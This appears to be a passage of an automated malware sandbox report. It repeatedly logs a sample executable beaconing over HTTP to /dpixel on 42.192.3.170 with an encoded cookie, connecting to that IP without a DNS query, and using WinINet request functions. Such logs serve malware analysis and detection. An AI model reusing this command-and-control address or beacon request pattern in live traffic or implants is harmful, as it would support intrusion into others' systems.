          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: unknownTCP traffic detected without corresponding DNS query: 42.192.3.170
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0066E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0066E68C
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
